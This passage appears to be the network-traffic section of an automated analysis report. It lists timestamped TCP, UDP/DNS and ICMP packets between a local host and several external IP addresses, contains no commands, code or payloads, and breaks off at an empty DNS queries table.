Jan 14, 2025 01:48:07.531337023 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.664499044 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.664654970 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:07.664720058 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.664834023 CET	49756	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:07.664856911 CET	443	49756	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:11.954467058 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:11.954628944 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:11.954857111 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:13.015372038 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.015414953 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:13.015484095 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.016231060 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.016241074 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:13.482007027 CET	49718	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:48:13.482017040 CET	443	49718	216.58.206.36	192.168.2.6
Jan 14, 2025 01:48:13.931112051 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:13.931212902 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.933188915 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.933197975 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:13.933958054 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:13.935075045 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.935122967 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.935127974 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:13.935205936 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:13.979376078 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:14.114710093 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:14.114800930 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:14.114934921 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:14.115155935 CET	49800	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:14.115170956 CET	443	49800	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:17.825829029 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:17.825869083 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:17.825989008 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:17.826256990 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:17.826273918 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.393416882 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:18.393496037 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:18.393670082 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:18.504529953 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.504962921 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.504982948 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.506623983 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.506731033 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.508004904 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.508090019 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.508282900 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.555341959 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.558259964 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.558290005 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.605062962 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.861562967 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.861663103 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:18.861864090 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.863053083 CET	49830	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:18.863070011 CET	443	49830	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:19.017915010 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.017946959 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.018618107 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.019243002 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.019253016 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.481235981 CET	49727	443	192.168.2.6	209.94.90.1
Jan 14, 2025 01:48:19.481309891 CET	443	49727	209.94.90.1	192.168.2.6
Jan 14, 2025 01:48:19.801004887 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.801198006 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.803219080 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.803234100 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.803477049 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.805320024 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.805404902 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.805417061 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.805569887 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.847335100 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.980556965 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.980639935 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:19.980755091 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.981082916 CET	49840	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:19.981106043 CET	443	49840	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:22.801348925 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:22.801378012 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:22.801456928 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:22.801983118 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:22.801997900 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.622960091 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.623038054 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.624733925 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.624744892 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.625503063 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.626713037 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.626799107 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.626808882 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.626972914 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.667339087 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.805881023 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.805996895 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:23.806057930 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.806313038 CET	49865	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:23.806339025 CET	443	49865	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.093091965 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.093168020 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.093256950 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.093823910 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.093842030 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.900141954 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.900305033 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.902081013 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.902092934 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.903011084 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.904258013 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.904320002 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.904330969 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:33.904423952 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:33.947359085 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:34.083591938 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:34.083703041 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:34.083769083 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:34.083924055 CET	49926	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:34.083944082 CET	443	49926	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.064568996 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.064671040 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.064758062 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.065267086 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.065304995 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.981074095 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.981161118 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.982929945 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.982949972 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.983170986 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.984849930 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.984849930 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:38.984891891 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:38.985327959 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:39.027335882 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:39.160662889 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:39.160733938 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:39.160800934 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:39.161024094 CET	49957	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:39.161063910 CET	443	49957	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:40.781265974 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:40.781291962 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:40.781339884 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:40.783524036 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:40.783538103 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:40.939939976 CET	80	49704	217.20.57.19	192.168.2.6
Jan 14, 2025 01:48:40.940095901 CET	49704	80	192.168.2.6	217.20.57.19
Jan 14, 2025 01:48:40.940150976 CET	49704	80	192.168.2.6	217.20.57.19
Jan 14, 2025 01:48:40.945044994 CET	80	49704	217.20.57.19	192.168.2.6
Jan 14, 2025 01:48:41.469099998 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.469448090 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:41.469461918 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.469764948 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.470189095 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:41.470246077 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.470379114 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:41.515328884 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.788355112 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.788526058 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:41.788594961 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:41.789192915 CET	49977	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:41.789212942 CET	443	49977	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:44.266196012 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:44.266278028 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:44.266376019 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:44.267121077 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:44.267157078 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.079638004 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.079888105 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.081337929 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.081373930 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.081907988 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.082886934 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.082932949 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.082984924 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.083009958 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.123342991 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.257523060 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.257596016 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:45.257827997 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.257978916 CET	49999	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:45.258017063 CET	443	49999	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:52.907799959 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:52.907871008 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:52.907928944 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:52.908324957 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:52.908344984 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.550597906 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.550934076 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:53.550968885 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.551333904 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.551640034 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:53.551712036 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.551769018 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:53.599333048 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.863491058 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.863576889 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:53.863675117 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:53.864239931 CET	50010	443	192.168.2.6	178.63.67.153
Jan 14, 2025 01:48:53.864264011 CET	443	50010	178.63.67.153	192.168.2.6
Jan 14, 2025 01:48:57.531061888 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:57.531145096 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:57.531241894 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:57.531826019 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:57.531858921 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.329343081 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.329626083 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.330960989 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.330992937 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.331352949 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.332473040 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.332520962 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.332532883 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.332639933 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.379333973 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.510468006 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.510660887 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:48:58.510860920 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.510957956 CET	50012	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:48:58.511002064 CET	443	50012	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:01.451227903 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:01.451268911 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:01.451395988 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:01.451569080 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:01.451577902 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:02.088505030 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:02.088771105 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:02.088790894 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:02.089096069 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:02.089540958 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:02.089598894 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:02.137337923 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:03.205368042 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:03.205444098 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:03.205554008 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:03.205952883 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:03.205982924 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:03.999265909 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:03.999342918 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.001200914 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.001214027 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:04.001543999 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:04.003187895 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.003247023 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.003251076 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:04.003377914 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.047369003 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:04.173530102 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:04.173719883 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:04.173800945 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.173918009 CET	50014	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:04.173959970 CET	443	50014	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:12.001615047 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:12.001777887 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:12.001836061 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:13.481863976 CET	50013	443	192.168.2.6	216.58.206.36
Jan 14, 2025 01:49:13.481893063 CET	443	50013	216.58.206.36	192.168.2.6
Jan 14, 2025 01:49:16.108371019 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.108421087 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:16.108536005 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.109206915 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.109221935 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:16.907876968 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:16.908184052 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.909970999 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.909984112 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:16.910320044 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:16.911652088 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.911706924 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.911712885 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:16.911803007 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:16.959321022 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:17.088170052 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:17.088285923 CET	443	50015	40.113.103.199	192.168.2.6
Jan 14, 2025 01:49:17.088339090 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:17.088465929 CET	50015	443	192.168.2.6	40.113.103.199
Jan 14, 2025 01:49:17.088485956 CET	443	50015	40.113.103.199	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 01:47:57.314193964 CET	53	50371	1.1.1.1	192.168.2.6
Jan 14, 2025 01:47:57.330415964 CET	53	61980	1.1.1.1	192.168.2.6
Jan 14, 2025 01:47:58.323295116 CET	53	63632	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:01.387720108 CET	58893	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:01.387995005 CET	59365	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:01.394747019 CET	53	59365	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:01.394951105 CET	53	58893	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:02.995712996 CET	50672	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:02.996062994 CET	49325	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:03.002499104 CET	53	50672	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:03.002888918 CET	53	49325	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:03.716706038 CET	53	49174	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:03.802484035 CET	53	57645	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:05.032299995 CET	53	58174	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:05.085119963 CET	53	59666	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:05.163089037 CET	53	55717	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:06.531626940 CET	50385	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:06.531766891 CET	61165	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:06.563375950 CET	53	61165	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:06.564047098 CET	53	50385	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:06.564726114 CET	57150	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:06.574182987 CET	53	57150	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:15.349924088 CET	53	59698	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:17.816916943 CET	54748	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:17.817187071 CET	65262	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:17.823972940 CET	53	54748	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:17.825356960 CET	53	65262	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:34.347809076 CET	53	56028	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:53.875329018 CET	63232	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:53.875540018 CET	63023	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:53.884803057 CET	53	63023	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:53.915518045 CET	53	63232	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:53.916222095 CET	61833	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:53.925489902 CET	53	61833	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:53.976732969 CET	53291	53	192.168.2.6	8.8.8.8
Jan 14, 2025 01:48:53.977421045 CET	57286	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:53.984163046 CET	53	57286	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:53.991873026 CET	53	53291	8.8.8.8	192.168.2.6
Jan 14, 2025 01:48:55.056818008 CET	54049	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:55.056874990 CET	56159	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:48:55.065527916 CET	53	54049	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:55.212682962 CET	53	56159	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:56.833280087 CET	53	53509	1.1.1.1	192.168.2.6
Jan 14, 2025 01:48:56.880590916 CET	53	63197	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:00.098555088 CET	58218	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:00.098705053 CET	61632	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:00.108118057 CET	53	61632	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:00.108302116 CET	53	58218	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:00.108903885 CET	65121	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:00.118330956 CET	53	65121	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:04.953588963 CET	62413	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:04.953723907 CET	52597	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:04.962074995 CET	53	62413	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:04.962651014 CET	53	52597	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:04.967361927 CET	54041	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:04.974354029 CET	53	54041	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:04.987778902 CET	59769	53	192.168.2.6	1.1.1.1
Jan 14, 2025 01:49:04.988279104 CET	51734	53	192.168.2.6	8.8.8.8
Jan 14, 2025 01:49:04.994517088 CET	53	59769	1.1.1.1	192.168.2.6
Jan 14, 2025 01:49:04.995873928 CET	53	51734	8.8.8.8	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 14, 2025 01:48:55.212749004 CET	192.168.2.6	1.1.1.1	c230	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
